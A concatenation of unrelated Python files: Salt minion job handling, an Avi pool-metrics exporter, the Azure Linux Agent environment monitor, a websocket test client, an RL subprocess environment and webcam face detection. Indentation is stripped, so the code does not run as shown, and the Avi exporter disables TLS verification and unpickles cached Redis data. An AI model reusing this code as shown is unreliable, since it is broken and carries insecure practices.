"return": [None] * num_funcs,
"retcode": [None] * num_funcs,
"success": [False] * num_funcs,
}
else:
ret = {"return": {}, "retcode": {}, "success": {}}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret["success"][data["fun"][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts["pillar"].get(
"minion_blackout", False
):
whitelist = minion_instance.opts["pillar"].get(
"minion_blackout_whitelist", []
)
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if (
data["fun"][ind] != "saltutil.refresh_pillar"
and data["fun"][ind] not in whitelist
):
minion_blackout_violation = True
elif minion_instance.opts["grains"].get("minion_blackout", False):
whitelist = minion_instance.opts["grains"].get(
"minion_blackout_whitelist", []
)
if (
data["fun"][ind] != "saltutil.refresh_pillar"
and data["fun"][ind] not in whitelist
):
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError(
'Minion in blackout mode. Set "minion_blackout" '
"to False in pillar or grains to resume operations. Only "
"saltutil.refresh_pillar allowed in blackout mode."
)
func = minion_instance.functions[data["fun"][ind]]
args, kwargs = salt.minion.load_args_and_kwargs(
func, data["arg"][ind], data
)
minion_instance.functions.pack["__context__"]["retcode"] = 0
key = ind if multifunc_ordered else data["fun"][ind]
ret["return"][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack["__context__"].get("retcode", 0)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(
ret["return"][key].get(x, True) for x in ("result", "success")
)
except Exception: # pylint: disable=broad-except
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret["retcode"][key] = retcode
ret["success"][key] = retcode == 0
except Exception as exc: # pylint: disable=broad-except
trb = traceback.format_exc()
log.warning("The minion function caused an exception: %s", exc)
if multifunc_ordered:
ret["return"][ind] = trb
else:
ret["return"][data["fun"][ind]] = trb
ret["jid"] = data["jid"]
ret["fun"] = data["fun"]
ret["fun_args"] = data["arg"]
if "metadata" in data:
ret["metadata"] = data["metadata"]
if minion_instance.connected:
minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
if data["ret"]:
if "ret_config" in data:
ret["ret_config"] = data["ret_config"]
if "ret_kwargs" in data:
ret["ret_kwargs"] = data["ret_kwargs"]
for returner in set(data["ret"].split(",")):
ret["id"] = opts["id"]
try:
minion_instance.returners["{}.returner".format(returner)](ret)
except Exception as exc: # pylint: disable=broad-except
log.error("The return failed for job %s: %s", data["jid"], exc)
def handle_payload(self, payload):
"""
Verify the publication and then pass
the payload along to _handle_decoded_payload.
"""
if payload is not None and payload["enc"] == "aes":
# First handle payload for the "control" proxy
if self._target_load(payload["load"]):
self._handle_decoded_payload(payload["load"])
# The following handles the sub-proxies
sub_ids = self.opts["proxy"].get("ids", [self.opts["id"]])
for _id in sub_ids:
instance = self.deltaproxy_objs[_id]
if instance._target_load(payload["load"]):
instance._handle_decoded_payload(payload["load"])
elif self.opts["zmq_filtering"]:
# In the filtering enabled case, we"d like to know when minion sees something it shouldnt
log.trace(
"Broadcast message received not for this minion, Load: %s", payload["load"]
)
# If it"s not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def handle_decoded_payload(self, data):
"""
Override this method if you wish to handle the decoded data
differently.
"""
if "user" in data:
log.info(
"User %s Executing command %s with jid %s",
data["user"],
data["fun"],
data["jid"],
)
else:
log.info("Executing command %s with jid %s", data["fun"], data["jid"])
log.debug("Command details %s", data)
# Don"t duplicate jobs
log.trace("Started JIDs: %s", self.jid_queue)
if self.jid_queue is not None:
if data["jid"] in self.jid_queue:
return
else:
self.jid_queue.append(data["jid"])
if len(self.jid_queue) > self.opts["minion_jid_queue_hwm"]:
self.jid_queue.pop(0)
if isinstance(data["fun"], str):
if data["fun"] == "sys.reload_modules":
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get("process_count_max")
if process_count_max > 0:
process_count = self.subprocess_list.count
once_logged = False
while process_count >= process_count_max:
if once_logged is False:
log.debug(
"Maximum number of processes reached while executing jid %s, waiting...",
data["jid"],
)
once_logged = True
yield tornado.gen.sleep(0.5)
process_count = self.subprocess_list.count
# We stash an instance references to allow for the socket
# communication in Windows. You can"t pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get("multiprocessing", True)
if multiprocessing_enabled:
if sys.platform.startswith("win"):
# let python reconstruct the minion on the other side if we"re
# running on windows
instance = None
process = SignalHandlingProcess(
target=target, args=(self, instance, instance.opts, data, self.connected)
)
else:
process = threading.Thread(
target=target,
args=(self, instance, instance.opts, data, self.connected),
name=data["jid"],
)
process.start()
process.name = "{}-Job-{}".format(process.name, data["jid"])
self.subprocess_list.add(process)
def target_load(self, load):
"""
Verify that the publication is valid.
"""
for key in ("tgt", "jid", "fun", "arg"):
if key not in load:
return False
# Verify that the publication applies to this minion
# It"s important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G "grain_key:grain_val" test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if "tgt_type" in load:
match_func = self.matchers.get("{}_match.match".format(load["tgt_type"]), None)
if match_func is None:
return False
if load["tgt_type"] in ("grain", "grain_pcre", "pillar"):
delimiter = load.get("delimiter", DEFAULT_TARGET_DELIM)
if not match_func(load["tgt"], delimiter=delimiter, opts=self.opts):
return False
elif not match_func(load["tgt"], opts=self.opts):
return False
else:
if not self.matchers["glob_match.match"](load["tgt"], opts=self.opts):
return False
return True
# Main Minion Tune In
def tune_in(self, start=True):
"""
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
"""
for proxy_id in self.deltaproxy_objs:
_proxy_minion = self.deltaproxy_objs[proxy_id]
_proxy_minion.setup_scheduler()
_proxy_minion.setup_beacons()
_proxy_minion._state_run()
super(ProxyMinion, self).tune_in(start=start)
|
pool_static.py | import json, requests, urllib3
from flask import Flask, request, jsonify
from datetime import datetime
import time
import traceback
import os
import redis
import cPickle as pickle
from multiprocessing import Process
def avi_request(avi_api,tenant,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({'X-Avi-Tenant': '%s' %tenant, 'content-type': 'application/json', 'X-Avi-Version': '%s' %api_version})
return requests.get('https://%s/api/%s' %(avi_controller,avi_api), verify=False, headers = headers,cookies=cookies,timeout=50)
def avi_post(api_url,tenant,payload,api_version='17.2.1'):
cookies=dict()
if 'avi-sessionid' in login.cookies.keys():
cookies['avi-sessionid'] = login.cookies['avi-sessionid']
else:
cookies['sessionid'] = login.cookies['sessionid']
headers = ({"X-Avi-Tenant": "%s" %tenant, 'content-type': 'application/json','referer': 'https://%s' %avi_controller, 'X-CSRFToken': dict(login.cookies)['csrftoken'],'X-Avi-Version':'%s' %api_version})
cookies['csrftoken'] = login.cookies['csrftoken']
return requests.post('https://%s/api/%s' %(avi_controller,api_url), verify=False, headers = headers,cookies=cookies, data=json.dumps(payload),timeout=50)
def pool_inventory_multiprocess(r,cloud_list,uuid_list,tenant_list):
try:
pool_inventory_cache_start = time.time()
pool_dict={}
proc = []
for t in tenant_list:
p = Process(target = pool_inventory_child, args = (r,cloud_list,uuid_list,tenant_list,t,))
p.start()
proc.append(p)
if len(proc) > 10:
for p in proc:
p.join()
proc = []
for p in proc:
p.join()
#----- get keys, consolidate then delete
inv_keys = r.keys('temp_pool_dict_*')
pool_dict = {}
for k in inv_keys:
_1 = pickle.loads(r.get(k))
pool_dict.update(_1)
r.delete(k)
pool_results = {}
pool_results['TOTAL_POOLS'] = len(pool_dict)
for p in pool_dict:
if pool_dict[p]['tenant'] not in pool_results:
pool_results[pool_dict[p]['tenant']] = 1
else:
pool_results[pool_dict[p]['tenant']] += 1
r.set('pool_results', pickle.dumps(pool_results))
r.set('pool_dict', pickle.dumps(pool_dict))
temp_total_time = str(time.time()-pool_inventory_cache_start)
print(str(datetime.now())+' =====> Refresh of Pool Inventory Cache took %s seconds' %temp_total_time)
except:
print(str(datetime.now())+' '+avi_controller+': func pool_inventory_multiprocess encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
def pool_inventory_child(r,cloud_list,uuid_list,tenant_list,t):
try:
pool_inventory_cache_start = time.time()
pool_inv = avi_request('pool?fields=cloud_ref,tenant_ref&page_size=200&include_name=true',t)
if pool_inv.status_code == 403:
print(str(datetime.now())+' =====> ERROR pool_inventory_child: %s' %pool_inv.text)
else:
pool_inv = pool_inv.json()
resp = pool_inv
page_number = 1
pool_dict = {}
while 'next' in resp:
page_number += 1
resp = avi_request('pool?fields=cloud_ref,tenant_ref&page_size=200&include_name=true&page='+str(page_number),t).json()
for p in resp['results']:
pool_inv['results'].append(p)
if pool_inv['count'] > 0:
for p in pool_inv['results']:
if p['tenant_ref'].rsplit('#')[1] in tenant_list:
if p['cloud_ref'].rsplit('#')[1].lower() in cloud_list or '*' in cloud_list:
if p['uuid'] in uuid_list or '*' in uuid_list:
if p['uuid'] not in pool_dict:
pool_dict[p['uuid']] = {}
pool_dict[p['uuid']]['name'] = p['name']
pool_dict[p['uuid']]['tenant'] = p['tenant_ref'].rsplit('#')[1]
pool_dict[p['uuid']]['cloud'] = p['cloud_ref'].rsplit('#')[1]
else:
if p['tenant_ref'].rsplit('#')[1] == 'admin':
pool_dict[p['uuid']]['tenant'] = 'admin'
r.set('temp_pool_dict_'+t,pickle.dumps(pool_dict))
temp_total_time = str(time.time()-pool_inventory_cache_start)
print(str(datetime.now())+' =====> Refresh of Pool Inventory Cache took %s seconds for tenant %s' %(temp_total_time,t))
except:
print(str(datetime.now())+' '+avi_controller+': func pool_inventory_child encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
def pool_metrics_multiprocess(r,uuid_list,pool_metric_list,tenant_list):
try:
discovered_servers = []
metric_resp = []
print(str(datetime.now())+' =====> Refreshing Pool Static Metrics Cache')
pool_static_metric_cache_start = time.time()
pool_dict = pickle.loads(r.get('pool_dict'))
proc = []
for t in tenant_list:
p = Process(target = pool_metrics_child, args = (r,uuid_list,pool_metric_list,pool_dict,t,))
p.start()
proc.append(p)
if len(proc) > 10:
for p in proc:
p.join()
proc = []
for p in proc:
p.join()
metric_keys = r.keys('temp_pool_stat_*')
for k in metric_keys:
_1 = pickle.loads(r.get(k))
metric_resp.append(_1['series']['collItemRequest:AllServers'])
r.delete(k)
#prom_metrics = ''
prom_metrics = ['\n']
for _resp in metric_resp:
for p in _resp:
if p.split(',')[1] in pool_dict:
if p not in discovered_servers:
discovered_servers.append(p)
for m in _resp[p]:
if 'data' in m:
temp_tags = ''
metric_name = m['header']['name'].replace('.','_').replace('-','_')
metric_description = m['header']['metric_description']
metric_value = m['data'][0]['value']
temp_payload = {}
temp_payload['name'] = pool_dict[p.split(',')[1]]['name']
temp_payload['uuid'] = p.split(',')[1]
temp_payload['server'] = p.split(',')[2]
temp_payload['cloud'] = pool_dict[p.split(',')[1]]['cloud']
temp_payload['tenant'] = m['header']['tenant_ref'].rsplit('#')[1]
temp_payload['entity_type'] = 'pool'
for e in temp_payload:
temp_tags=temp_tags+(str(e+'="'+temp_payload[e]+'",'))
temp_tags = '{'+temp_tags.rstrip(',')+'}'
#prom_metrics = prom_metrics+'\n'+metric_name+''+temp_tags+' '+str(metric_value)
prom_metrics.append('%s 01# HELP %s %s' %(metric_name,metric_name, metric_description))
prom_metrics.append('%s 02# TYPE %s gauge' %(metric_name,metric_name))
prom_metrics.append('%s %s %s' %(metric_name,temp_tags,str(metric_value)))
#prom_metrics = prom_metrics+'\n'
#pool_metrics = prom_metrics
prom_metrics = list(set(prom_metrics))
prom_metrics = sorted(prom_metrics)
for idx, item in enumerate(prom_metrics):
if '01#' in item:
item = item.split('01',1)[1]
prom_metrics[idx] = item
elif '02#' in item:
item = item.split('02',1)[1]
prom_metrics[idx] = item
prom_metrics.append('\n')
_pool_metrics = '\n'.join(prom_metrics)
r.set('pool_polling', 'False')
missing_metrics = []
for _p in pool_dict:
if pool_dict[_p]['name'] not in _pool_metrics:
_a = pool_dict[_p]['tenant']+' : '+pool_dict[_p]['name']
missing_metrics.append(_a)
r.set('pool_missing_metrics', pickle.dumps(missing_metrics))
#r.set('pool_metrics', pickle.dumps(pool_metrics))
r.set('pool_metrics', pickle.dumps(prom_metrics))
temp_total_time = str(time.time()-pool_static_metric_cache_start)
print(str(datetime.now())+' =====> Refresh of Pool Metrics Cache took %s seconds' %temp_total_time)
except:
r.set('pool_polling', 'False')
print(str(datetime.now())+' '+avi_controller+': func pool_metrics_multiprocess encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
def pool_metrics_child(r,uuid_list,pool_metric_list,pool_dict,t):
try:
pool_static_metric_cache_start = time.time()
if '*' in uuid_list:
entity_uuid = '*'
else:
_temp_uuid_list = []
for e in uuid_list:
if pool_dict[e]['tenant'] == t:
_temp_uuid_list.append(e)
entity_uuid = ','.join(_temp_uuid_list)
payload = {
"metric_requests": [
{
"step": 300,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"obj_id": "*",
"pool_uuid": entity_uuid,
"id": "collItemRequest:AllServers",
"metric_id": pool_metric_list
}
]}
pool_stat = avi_post('analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true', t, payload).json()
r.set('temp_pool_stat_'+t,pickle.dumps(pool_stat))
temp_total_time = str(time.time()-pool_static_metric_cache_start)
print(str(datetime.now())+' =====> Refresh of Pool Metrics Cache took %s seconds for tenant %s' %(temp_total_time,t))
except:
print(str(datetime.now())+' : func pool_metrics_child encountered an error for tenant: '+t)
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
def refresh_pool_metrics(r,avi_login,controller):
try:
global login
login = avi_login
global avi_controller
avi_controller = controller
r.set('pool_last_poll_start_time', time.time())
#---
cloud_list = []
_cloud_list = pickle.loads(r.get('pool_cloud'))
for c in _cloud_list:
cloud_list.append(c)
#---
uuid_list = []
_uuid_list = pickle.loads(r.get('pool_entity_uuid'))
if '*' in _uuid_list:
uuid_list = '*'
else:
for u in _uuid_list:
uuid_list.append(u)
#---
tenant_list = []
_tenant_list = pickle.loads(r.get('pool_tenant'))
for t in _tenant_list:
tenant_list.append(t)
#---
pool_metric_list = []
_pool_metric_list = pickle.loads(r.get('pool_metric_id'))
for p in _pool_metric_list:
pool_metric_list.append(p)
pool_metric_list = ','.join(pool_metric_list)
#---
pool_inventory_multiprocess(r,cloud_list,uuid_list,tenant_list)
pool_metrics_multiprocess(r,uuid_list,pool_metric_list,tenant_list)
r.set('pool_last_poll_time', time.time())
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
|
env.py | # Microsoft Azure Linux Agent
#
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import re
import os
import socket
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.dhcp import get_dhcp_handler
from azurelinuxagent.common.event import add_periodic, WALAEventOperation
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils.archive import StateArchiver
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
CACHE_PATTERNS = [
re.compile("^(.*)\.(\d+)\.(agentsManifest)$", re.IGNORECASE), # pylint: disable=W1401
re.compile("^(.*)\.(\d+)\.(manifest\.xml)$", re.IGNORECASE), # pylint: disable=W1401
re.compile("^(.*)\.(\d+)\.(xml)$", re.IGNORECASE) # pylint: disable=W1401
]
MAXIMUM_CACHED_FILES = 50
def get_env_handler():
return EnvHandler()
class EnvHandler(ThreadHandlerInterface): # pylint: disable=R0902
"""
Monitor changes to dhcp and hostname.
If dhcp client process re-start has occurred, reset routes, dhcp with fabric.
Monitor scsi disk.
If new scsi disk found, set timeout
"""
_THREAD_NAME = "EnvHandler"
@staticmethod
def get_thread_name():
return EnvHandler._THREAD_NAME
def __init__(self):
self.osutil = get_osutil()
self.dhcp_handler = get_dhcp_handler()
self.protocol_util = None
self._protocol = None
self.stopped = True
self.hostname = None
self.dhcp_id_list = []
self.server_thread = None
self.dhcp_warning_enabled = True
self.archiver = StateArchiver(conf.get_lib_dir())
self._reset_firewall_rules = False
self._periodic_operations = [
PeriodicOperation("_remove_persistent_net_rules", self._remove_persistent_net_rules_period, conf.get_remove_persistent_net_rules_period()),
PeriodicOperation("_monitor_dhcp_client_restart", self._monitor_dhcp_client_restart, conf.get_monitor_dhcp_client_restart_period()),
PeriodicOperation("_cleanup_goal_state_history", self._cleanup_goal_state_history, conf.get_goal_state_history_cleanup_period())
]
if conf.enable_firewall():
self._periodic_operations.append(PeriodicOperation("_enable_firewall", self._enable_firewall, conf.get_enable_firewall_period()))
if conf.get_root_device_scsi_timeout() is not None:
self._periodic_operations.append(PeriodicOperation("_set_root_device_scsi_timeout", self._set_root_device_scsi_timeout, conf.get_root_device_scsi_timeout_period()))
if conf.get_monitor_hostname():
self._periodic_operations.append(PeriodicOperation("_monitor_hostname", self._monitor_hostname_changes, conf.get_monitor_hostname_period()))
def run(self):
if not self.stopped:
logger.info("Stop existing env monitor service.")
self.stop()
self.stopped = False
logger.info("Start env monitor service.")
self.dhcp_handler.conf_routes()
self.hostname = self.osutil.get_hostname_record()
self.dhcp_id_list = self.get_dhcp_client_pid()
self.start()
def is_alive(self):
return self.server_thread.is_alive()
def start(self):
self.server_thread = threading.Thread(target=self.monitor)
self.server_thread.setDaemon(True)
self.server_thread.setName(self.get_thread_name())
self.server_thread.start()
def monitor(self):
try:
# The initialization of ProtocolUtil for the Environment thread should be done within the thread itself rather
# than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self._protocol = self.protocol_util.get_protocol()
while not self.stopped:
try:
for op in self._periodic_operations: # pylint: disable=C0103
op.run()
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the environment thread main loop; will skip the current iteration.\n{0}", ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the environment thread; will exit the thread.\n{0}", ustr(e))
def _remove_persistent_net_rules_period(self):
self.osutil.remove_rules_files()
def _enable_firewall(self):
# If the rules ever change we must reset all rules and start over again.
#
# There was a rule change at 2.2.26, which started dropping non-root traffic
# to WireServer. The previous rules allowed traffic. Having both rules in
# place negated the fix in 2.2.26.
if not self._reset_firewall_rules:
self.osutil.remove_firewall(dst_ip=self._protocol.get_endpoint(), uid=os.getuid())
self._reset_firewall_rules = True
success = self.osutil.enable_firewall(dst_ip=self._protocol.get_endpoint(), uid=os.getuid())
add_periodic(
logger.EVERY_HOUR,
AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.Firewall,
is_success=success,
log_event=False)
def _set_root_device_scsi_timeout(self):
self.osutil.set_scsi_disks_timeout(conf.get_root_device_scsi_timeout())
def _monitor_hostname_changes(self):
curr_hostname = socket.gethostname()
if curr_hostname != self.hostname:
logger.info("EnvMonitor: Detected hostname change: {0} -> {1}",
self.hostname,
curr_hostname)
self.osutil.set_hostname(curr_hostname)
self.osutil.publish_hostname(curr_hostname)
self.hostname = curr_hostname
def get_dhcp_client_pid(self):
pid = []
try:
# return a sorted list since handle_dhclient_restart needs to compare the previous value with
# the new value and the comparison should not be affected by the order of the items in the list
pid = sorted(self.osutil.get_dhcp_pid())
if len(pid) == 0 and self.dhcp_warning_enabled: # pylint: disable=len-as-condition
logger.warn("Dhcp client is not running.")
except Exception as exception:
if self.dhcp_warning_enabled:
logger.error("Failed to get the PID of the DHCP client: {0}", ustr(exception))
self.dhcp_warning_enabled = len(pid) != 0
return pid
def _monitor_dhcp_client_restart(self):
self.handle_dhclient_restart()
def handle_dhclient_restart(self):
if len(self.dhcp_id_list) == 0: # pylint: disable=len-as-condition
self.dhcp_id_list = self.get_dhcp_client_pid()
return
if all(self.osutil.check_pid_alive(pid) for pid in self.dhcp_id_list):
return
new_pid = self.get_dhcp_client_pid()
if len(new_pid) != 0 and new_pid != self.dhcp_id_list: # pylint: disable=len-as-condition
logger.info("EnvMonitor: Detected dhcp client restart. Restoring routing table.")
self.dhcp_handler.conf_routes()
self.dhcp_id_list = new_pid
def _cleanup_goal_state_history(self):
"""
Purge history and create a .zip of the history that has been preserved.
"""
self.archiver.purge()
self.archiver.archive()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.stopped = True
if self.server_thread is not None:
self.server_thread.join()
|
__main__.py | # coding: utf-8
from logging import info
import logging; logging.basicConfig(level=logging.DEBUG)
from json import dumps
from multiprocessing import Process
from tentacle.sensor import discover
from tentacle.client import publish
sensors = discover()
payload = {}
for sensor in sensors:
payload = {**payload, **sensor.get_dict()}
#TODO Decide if background daemons are better: daemon=True
process = Process(target=sensor.measuring_loop, name=sensor.sensor_id)
process.start()
info(f"Started background process {process.pid}: {process.name} for {sensor.sensor_id}")
publish('tentacle/status', payload=dumps(payload))
|
poc_ws_client.py | #!/usr/bin/env python
import asyncio
import websockets
from threading import Thread
from uuid import uuid4
from theia.comm import Client
from theia.model import Event
loop = asyncio.get_event_loop()
loop.set_debug(True)
print('1')
def recv(msg):
print('RECEIVED: ', msg)
cl = Client(loop, host='localhost', port=8765, path='/event', recv=recv)
cl.connect()
def do_send():
while True:
msg = input('>')
id = str(uuid4())
cl.send_event(Event(id=id, source='repl-test', content=msg))
print(' >>%s:%s' % (id, msg))
Thread(target=do_send).start()
loop.run_forever()
|
subproc_vec_env.py | import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset(ex_init=data) for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv().x
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self, ex_inits=None, record=False):
self._assert_not_closed()
if ex_inits is not None:
assert len(ex_inits) >= self.num_envs
for remote, ex_init in zip(self.remotes, ex_inits):
remote.send(('reset', ex_init))
else:
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
# nirbz: restricting the number of images because of memory issues
if len(self.remotes) > 16:
remotes = self.remotes[:16]
else:
remotes = self.remotes
for pipe in remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in remotes]
imgs = _flatten_list(imgs)
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
flattened_obs = {k: np.stack([o[k] for o in obs]) for k in keys}
return flattened_obs
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
LiveDetect.py | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 30 14:46:44 2020
@author: Ayman Al Jabri
This script multithreads face detection on webcam . I Tried it on 16' MacPro and it works smoothly
If you wanna run it in faceRecognition mode, make sure to train the model first and save it in
results directory along with classes. To do that run averroes.py first in /FaceRecognition folder.
Tested with:
opencv-contrib-python==4.5.3
"""
import cv2
import queue
import joblib
import threading
import argparse
from FaceDetection.models import f_net, haar, hog
import pandas as pd
classes = pd.read_csv('FaceRecognition/results/classes.csv')
classes = classes.values.reshape(len(classes))
class FaceDetectLive(object):
'''
Create a face-detection object using webcam.
classifier: choices between "HAAR", "FaceNet" or "HOG"
recognize: path to an sklearn modle trained on features extracted from Facenet
'''
def __init__(self, classifier, recognize=None, skip_n=1,
h_res=400, v_res=600, font=cv2.FONT_HERSHEY_DUPLEX, th = False):
self.clf = classifier
self.recognize = recognize
if recognize is not None:
self.model = joblib.load(recognize)
self.net = f_net.net
self.skip_n = skip_n
self.h_res = h_res
self.v_res = v_res
self.font = font
self.__VideoCapture__()
self.q = queue.deque(maxlen=100)
self.th = th
self.idx = 0
def __VideoCapture__(self):
self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
self.cap.open(0)
self.cap.set(3, self.h_res)
self.cap.set(4, self.v_res)
def __timer__(self):
return (self.idx % self.skip_n == 0)
def __thread__(self, frame):
th = threading.Thread(target=self.__append_faces__, args=(frame,))
th.start()
def __append_faces__(self, frame):
faces = self.clf.find_faces(frame)
self.q.append(faces)
def play(self):
faces_old,old_names,faces = None, None, None
while True:
good , frame = self.cap.read()
if not good:
continue
frame = cv2.flip(frame,1) #flip horizontaly because it looks better!
if self.__timer__():
if self.th:
self.__thread__(frame)
else:
self.__append_faces__(frame)
faces = self.q.pop() if len(self.q) > 0 else faces_old
if faces is not None and self.recognize and self.idx % 30 ==0 :
try:
ii = self.clf(frame)
features = self.net(ii).detach()
d = self.model.predict(features).tolist()
names = classes[d]
old_names = names
except:
pass
faces_old = faces
frame = self.clf.draw_rect(frame, faces_old, old_names)
self.idx += 1
cv2.imshow('face', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):break
self.cap.release()
cv2.destroyAllWindows()
self.q.clear()
pass
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--file',
help='Name and path of the HAAR file')
parser.add_argument('--n', type= int, default=1,
help='Detect faces on the Nth frame')
parser.add_argument('--algo',
help='Algorithm to use: choose between: "haar", "hog" and "facenet"')
parser.add_argument('--threading', default=False, action='store_true',
help='Use threading to detect faces')
parser.add_argument('--recognize', action='store_true', default =False,
help='recognize the face using features')
arg = parser.parse_args()
pathM = None
fname = (arg.file if arg.file else 'FaceDetection/models/haarcascade_frontalface_default.xml')
if arg.algo == 'facenet' or arg.recognize:
clf = f_net.FaceNet(**f_net.params)
if arg.recognize:
pathM = 'FaceRecognition/results/model.joblib'
elif arg.algo =='hog':
clf = hog.HOG()
else:
clf = haar.HAAR(fname)
cam = FaceDetectLive(clf, recognize= pathM, skip_n=arg.n, th=arg.threading)
cam.play() |
task.py | import time
import threading
class TaskResult(object):
DONE = 0
CONT = 1
WAIT = 2
class TaskError(RuntimeError):
"""
A task specific runtime error
"""
class Task(object):
def __init__(self, id):
self.id = id
self.name = 'Task-%d' % id
self.function = None
self.timestamp = time.time()
self.delay = 0.0
self.can_delay = True
self.args = []
self.kwargs = {}
